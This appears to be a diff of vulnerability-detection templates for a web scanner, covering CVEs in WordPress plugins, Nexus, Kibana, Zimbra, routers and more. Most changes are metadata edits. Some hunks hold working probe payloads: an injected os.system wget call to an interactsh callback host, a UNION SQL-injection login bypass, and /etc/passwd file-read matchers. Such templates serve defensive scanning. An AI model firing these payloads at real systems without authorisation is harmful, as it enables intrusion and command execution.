||||
author: dwisiswant0
|
||||
severity: medium
|
||||
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter
|
||||
(aka $search_term or the Search field).
|
||||
description: "WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field)."
|
||||
reference:
|
||||
- https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-6112
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2019-7238
|
||||
|
||||
info:
|
||||
name: NEXUS < 3.14.0 Remote Code Execution
|
||||
name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
|
||||
description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
|
||||
- https://github.com/jas502n/CVE-2019-7238
|
||||
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -4,10 +4,11 @@ info:
|
|||
name: eMerge E3 1.00-06 - Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Linear eMerge E3-Series devices allow Command Injections.
|
||||
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47619
|
||||
- http://linear-solutions.com/nsc_family/e3-series/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2019-7609
|
||||
|
||||
info:
|
||||
name: Kibana Timelion Arbitrary Code Execution
|
||||
name: Kibana Timelion - Arbitrary Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt
|
||||
to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
|
||||
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
|
||||
reference:
|
||||
- https://github.com/mpgn/CVE-2019-7609
|
||||
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-8982
|
||||
|
||||
info:
|
||||
name: Wavemaker Studio 6.6 Local File Inclusion/Server-Side Request Forgery
|
||||
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.
|
||||
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/45158
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
|
||||
|
@ -29,4 +29,5 @@ requests:
|
|||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/04/18
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-9618
|
||||
|
||||
info:
|
||||
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
|
||||
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
|
||||
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
|
||||
- https://seclists.org/fulldisclosure/2019/Mar/26
|
||||
|
@ -32,3 +32,5 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
- 500
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2019-9670
|
||||
|
||||
info:
|
||||
name: Zimbra Collaboration XXE
|
||||
name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
|
||||
author: ree4pwn
|
||||
severity: critical
|
||||
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
|
||||
description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/46693/
|
||||
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
|
||||
|
@ -12,6 +12,7 @@ info:
|
|||
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
|
||||
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
|
||||
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -48,3 +49,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 503
|
||||
|
||||
# Enhanced by mp on 2022/05/03
|
||||
|
|
|
@ -1,17 +1,15 @@
|
|||
id: CVE-2019-9733
|
||||
|
||||
info:
|
||||
name: Artifactory Access-Admin Login Bypass
|
||||
name: JFrog Artifactory 6.7.3 - Admin Login Bypass
|
||||
author: akshansh
|
||||
severity: critical
|
||||
description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory
|
||||
console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the
|
||||
access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in
|
||||
turn, assume full control of all artifacts and repositories managed by Artifactory.
|
||||
description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
|
||||
- https://www.ciphertechs.com/jfrog-artifactory-advisory/
|
||||
- https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-9733
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -43,3 +41,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,10 +1,11 @@
|
|||
id: CVE-2020-11034
|
||||
|
||||
info:
|
||||
name: GLPI v.9.4.6 - Open redirect
|
||||
name: GLPI <9.4.6 - Open Redirect
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
|
||||
description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
|
||||
remediation: Upgrade to version 9.4.6 or later.
|
||||
reference:
|
||||
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
|
||||
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
|
||||
|
@ -28,3 +29,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2020-11529
|
||||
|
||||
info:
|
||||
name: Grav 1.7 Open Redirect
|
||||
name: Grav <1.7 - Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x.
|
||||
description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.
|
||||
reference:
|
||||
- https://github.com/getgrav/grav/issues/3134
|
||||
- https://www.cvedetails.com/cve/CVE-2020-11529
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11529
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -25,3 +26,5 @@ requests:
|
|||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,11 +1,10 @@
|
|||
id: CVE-2020-11546
|
||||
|
||||
info:
|
||||
name: SuperWebmailer Remote Code Execution
|
||||
name: SuperWebmailer 7.21.0.01526 - Remote Code Execution
|
||||
author: Official_BlackHat13
|
||||
severity: critical
|
||||
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to
|
||||
execute arbitrary PHP code via Code Injection.
|
||||
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
|
||||
reference:
|
||||
- https://github.com/Official-BlackHat13/CVE-2020-11546/
|
||||
- https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
|
||||
|
@ -41,3 +40,5 @@ requests:
|
|||
- ajax_getemailingactions.php
|
||||
- ajax_getemailtemplates.php
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-12116
|
||||
|
||||
info:
|
||||
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
|
||||
name: Zoho ManageEngine OpManger - Arbitrary File Read
|
||||
author: dwisiswant0
|
||||
severity: high
|
||||
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
|
||||
|
@ -48,4 +48,4 @@ requests:
|
|||
- 'status_code_2 == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/04/04
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -4,10 +4,10 @@ info:
|
|||
name: Onkyo TX-NR585 Web Interface - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
|
||||
description: "Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion."
|
||||
reference:
|
||||
- https://blog.spookysec.net/onkyo-lfi
|
||||
- https://www.cvedetails.com/cve/CVE-2020-12447
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-12447
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
|
@ -30,3 +30,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-14092
|
||||
|
||||
info:
|
||||
name: WordPress PayPal Pro <1.1.65- SQL Injection
|
||||
name: WordPress PayPal Pro <1.1.65 - SQL Injection
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: "WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format."
|
||||
|
@ -40,4 +40,4 @@ requests:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/04/27
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -19,15 +19,17 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
headers:
|
||||
X-Forwarded-Prefix: "https://foo.nl"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
|
||||
condition: or
|
||||
part: body
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2020-17453
|
||||
|
||||
info:
|
||||
name: WSO2 Carbon Management Console - XSS
|
||||
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
|
||||
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
|
||||
reference:
|
||||
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -34,3 +35,5 @@ requests:
|
|||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -19,6 +19,7 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 1
|
||||
matchers-condition: and
|
||||
|
@ -26,17 +27,19 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- "artica-applianc"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 301
|
||||
- 302
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
name: session
|
||||
part: header
|
||||
words:
|
||||
- "PHPSESSID"
|
||||
part: header
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-19360
|
||||
|
||||
info:
|
||||
name: FHEM 6.0 Local File Inclusion
|
||||
name: FHEM 6.0 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
|
||||
|
@ -28,3 +28,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,12 +1,13 @@
|
|||
id: CVE-2020-2140
|
||||
|
||||
info:
|
||||
name: Jenkin Audit Trail Plugin XSS
|
||||
name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting
|
||||
author: j3ssie/geraldino2
|
||||
severity: medium
|
||||
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
|
||||
description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
|
||||
reference:
|
||||
- https://www.jenkins.io/security/advisory/2020-03-09/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -4,10 +4,10 @@ info:
|
|||
name: Kyocera Printer d-COPIA253MF - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
|
||||
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48561
|
||||
- https://www.cvedetails.com/cve/CVE-2020-23575
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
|
||||
- https://www.kyoceradocumentsolutions.com.tr/tr.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
|
@ -33,3 +33,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2020-24223
|
||||
|
||||
info:
|
||||
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
|
||||
name: Mara CMS 7.5 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
|
||||
description: "Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters."
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48777
|
||||
- https://sourceforge.net/projects/maracms/ # vendor homepage
|
||||
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24223
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -33,3 +34,5 @@ requests:
|
|||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/05/04
|
||||
|
|
|
@ -16,16 +16,16 @@ info:
|
|||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "Location: https://example.com"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 301
|
||||
|
|
|
@ -27,13 +27,17 @@ requests:
|
|||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
||||
|
||||
- |
|
||||
POST /auth HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -5,11 +5,11 @@ info:
|
|||
author: gy741
|
||||
severity: critical
|
||||
description: |
|
||||
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
|
||||
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
||||
- https://www.tenable.com/security/research/tra-2021-13
|
||||
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- 'pppoe'
|
||||
- 'wan'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,11 +1,10 @@
|
|||
id: CVE-2021-20158
|
||||
|
||||
info:
|
||||
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change
|
||||
name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden
|
||||
administrative command.
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
|
@ -51,4 +50,4 @@ requests:
|
|||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by cs on 2022/02/25
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,12 +1,10 @@
|
|||
id: CVE-2021-20167
|
||||
|
||||
info:
|
||||
name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface
|
||||
name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter.
|
||||
Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination
|
||||
of CVE-2021-20166 and CVE-2021-20167.'
|
||||
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-55
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20166
|
||||
|
@ -34,4 +32,4 @@ requests:
|
|||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by cs on 2022/02/22
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,11 +1,10 @@
|
|||
id: CVE-2021-20837
|
||||
|
||||
info:
|
||||
name: Unauthenticated RCE In MovableType
|
||||
name: MovableType - Remote Command Injection
|
||||
author: dhiyaneshDK,hackergautam
|
||||
severity: critical
|
||||
description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced
|
||||
1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
|
||||
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
|
||||
reference:
|
||||
- https://nemesis.sh/posts/movable-type-0day/
|
||||
- https://github.com/ghost-nemesis/cve-2021-20837-poc
|
||||
|
@ -53,3 +52,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,11 +1,10 @@
|
|||
id: CVE-2021-21307
|
||||
|
||||
info:
|
||||
name: Remote Code Exploit in Lucee Admin
|
||||
name: Lucee Admin - Remote Code Execution
|
||||
author: dhiyaneshDk
|
||||
severity: critical
|
||||
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated
|
||||
remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
|
||||
description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
|
||||
reference:
|
||||
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
|
||||
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
|
||||
|
@ -15,6 +14,7 @@ info:
|
|||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-21307
|
||||
cwe-id: CWE-862
|
||||
remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
|
||||
tags: cve,cve2021,rce,lucee,adobe
|
||||
|
||||
requests:
|
||||
|
@ -84,3 +84,5 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "(u|g)id=.*"
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2021-21479
|
||||
|
||||
info:
|
||||
name: SCIMono < v0.0.19 Remote Code Execution
|
||||
name: SCIMono <0.0.19 - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
In SCIMono before 0.0.19, it is possible for an attacker to inject and
|
||||
execute java expression compromising the availability and integrity of the system.
|
||||
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
|
||||
execute java expressions and compromise the availability and integrity of the system.
|
||||
reference:
|
||||
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
||||
cvss-score: 9.1
|
||||
|
@ -30,3 +31,5 @@ requests:
|
|||
- '"status" : "400"'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -1,11 +1,10 @@
|
